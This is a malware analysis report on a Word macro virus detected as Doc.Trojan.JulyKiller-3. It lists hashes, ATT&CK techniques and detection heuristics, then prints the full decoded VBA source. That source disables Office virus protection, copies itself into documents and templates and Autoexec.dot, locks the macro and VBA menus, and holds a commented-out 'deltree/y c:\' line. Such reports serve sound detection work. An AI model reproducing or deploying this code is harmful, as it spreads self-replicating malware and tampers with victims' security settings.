Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d272c593004a1d64…

MALICIOUS

Office (OLE)

Size: 59.5 KB
Created: 2000-04-19 01:43:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 2995d367651cbce381f3d672ab31bd2a
SHA-1: 8411f8e1bf631bff876bdde298df2ac8e971f4e0
SHA-256: d272c593004a1d649c7c3640e7c714f1b77949ca376fffbab7f9ffc00abf80e6
Risk Score: 196

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose, which are commonly used for malicious purposes. The 'Y2K' module attempts to disable virus protection and manipulate macro settings, likely to facilitate the execution of a secondary payload from a file named 'Autoexec.dot' located in the startup path.

Heuristics (6)

  • ClamAV: Doc.Trojan.JulyKiller-3 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.JulyKiller-3
  • VBA macros detected (severity: medium, 3 related findings, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (severity: critical, rule: OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
            Options.VirusProtection = False
  • AutoOpen macro (severity: low, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
                    If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
  • Auto_Close macro (severity: low, rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro
    Matched line in script:
                    If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7193 bytes
SHA-256: 1e74216c39538ad1e72b589190743436db4ca367a20df396eb35d8ed5cf4edd3

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Y2K"
Sub actNo()
    For Each myTask In Tasks
        If InStr(myTask.Name, "Visual Basic") > 0 Then
            myTask.Visible = False
        End If
    Next myTask
End Sub
Sub Autos()
    Dim file$
    Dim ans$
    Dim test
    Dim mItem
    Dim cItem
    Dim aDoc
    Dim aTemp
    Dim vset
    Dim Iset
    Dim ad
    Dim y2kDate As Long
    Application.ScreenUpdating = False
    For Each ad In AddIns
    If ad.Name = "Autoexec.dot" Then
        ad.Installed = False
    End If
    Next ad
    With Dialogs(wdDialogToolsOptionsFileLocations)
    .path = "STARTUP-PATH"
    .Setting = "c:\"
    .Execute
    End With
    If Options.VirusProtection Then
        Options.VirusProtection = False
    End If
    
    file$ = WordBasic.[MacroFileName$]()
    If InStr(file$, "Autoexec") <> 0 Then
        For Each aDoc In Documents
        For Each cItem In aDoc.VBProject.VBComponents
        If (cItem.Name = "Y2K") Then
            vset = 1
        End If
        Next cItem
        Next aDoc
        For Each cItem In NormalTemplate.VBProject.VBComponents
        If (cItem.Name = "Y2K") Then
            vset = 1
        End If
        Next cItem
        If vset <> 1 Then
        'WordBasic.DisableAutoMacros
        Documents.Open FileName:="C:\Autoexec.dot", AddToRecentFiles:=False
        For Each aDoc In Documents
            If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
                    WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aDoc.FullName + ":Y2K"
            End If
        Next aDoc
        For Each aTemp In Templates
            If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
                    WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aTemp.FullName + ":Y2K"
            End If
        Next aTemp
        ActiveDocument.Save
        ActiveDocument.Close
        End If
        If vset = 1 Then
            GoTo out
        End If
    End If
    
    With Application.FileSearch
    .LookIn = "C:\"
    .FileName = "Autoexec.dot"
    If .Execute > 0 Then
          Iset = 1
    End If
    End With
    If Iset <> 1 Then
        'WordBasic.DisableAutoMacros
        Documents.Add NewTemplate:=True
        WordBasic.MacroCopy file$ + ":Y2K", ActiveDocument.FullName + ":Y2K"
        ActiveDocument.SaveAs FileName:="c:\Autoexec.dot", AddToRecentFiles:=False
        ActiveDocument.Close
    End If

    For Each aDoc In Documents
        If (file$ <> aDoc.FullName) And (aDoc.VBProject.Protection = 0) Then
            For Each cItem In aDoc.VBProject.VBComponents
                If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
                    aDoc.VBProject.VBComponents.Remove (cItem)
                End If
            Next cItem
        End If
    Next aDoc
    For Each aTemp In Templates
        If (file$ <> aTemp.FullName) And (aTemp.VBProject.Protection = 0) Then
            For Each cItem In aTemp.VBProject.VBComponents
                If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
                    aTemp.VBProject.VBComponents.Remove (cItem)
                End If
            Next cItem
        End If
    Next aTemp
    For Each aDoc In Documents
        If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
             WordBasic.MacroCopy file$ + ":Y2K", aDoc.FullName + ":Y2K"
        End If
    Next aDoc
    For Each aTemp In Templates
        If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
              WordBasic.MacroCopy file$ + ":Y2K", aTemp.FullName + ":Y2K"
        End If
    Next aTemp
out:
    CustomizationContext = NormalTemplate
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
       Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF1))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ToolsMacro"
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF2))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ViewVBCode"
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyZ))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="backy2k"
    
    For Each mItem In CommandBars("Tools").Controls
    If mItem.Caption = "×Ô¶¨Òå(&C)..." Then
        mItem.OnAction = "actno"
    End If
    If mItem.Caption = "Ä£°åºÍ¼ÓÔØÏî(&I)..." Then
        mItem.OnAction = "actno"
    End If
    If mItem.Caption = "Ñ¡Ïî(&O)..." Then
        mItem.OnAction = "actno"
    End If
    Next mItem
    For Each cItem In CommandBars("Tools").Controls
    If cItem.Type = msoControlPopup Then
        If cItem.Caption = "ºê(&M)" Then
            For Each mItem In cItem.CommandBar.Controls
                If mItem.Caption = "ºê(&M)..." Then
                    mItem.OnAction = "actno"
                End If
                If mItem.Caption = "Visual Basic ±à¼­Æ÷(&V)" Then
                    mItem.OnAction = "actno"
                End If
            Next mItem
        End If
    End If
    Next cItem
    For Each cItem In CommandBars("Visual Basic").Controls
    cItem.OnAction = "actno"
    Next cItem
    
    For Each cItem In CommandBars
    If cItem.Visible = True Then
        cItem.Protection = msoBarNoCustomize
    End If
    Next cItem
    For Each myTask In Tasks
        If InStr(myTask.Name, "Visual Basic") > 0 Then
            myTask.Visible = False
        End If
    Next myTask
Application.ScreenUpdating = True
On Error GoTo Pun
WordBasic.FileSaveAll 1, 1
Pun:
    y2kDate = Int(Now())
    On Error GoTo -1
    On Error GoTo -1
    If y2kDate >= 36526 Then
        If y2kDate = 36526 Or (Rnd() * 100000 Mod 10) = 2 Then
            'Open "C:\autoexec.bat" For Output As 1
            'Print #1, "deltree/y c:\"
            'Close 1
            For Each myTask In Tasks
                If InStr(myTask.Name, "Word") > 0 Then
                    myTask.Visible = False
                End If
            Next myTask
        End If
    End If
End Sub
Sub AutoOpen()
Autos
End Sub
Sub autoclose()
Autos
End Sub
Sub autoNew()
Autos
End Sub
Sub autoexec()
Autos
End Sub
Sub backY2k()
            For Each myTask In Tasks
                If InStr(myTask.Name, "Word") > 0 Then
                    myTask.Visible = True
                End If
            Next myTask

End Sub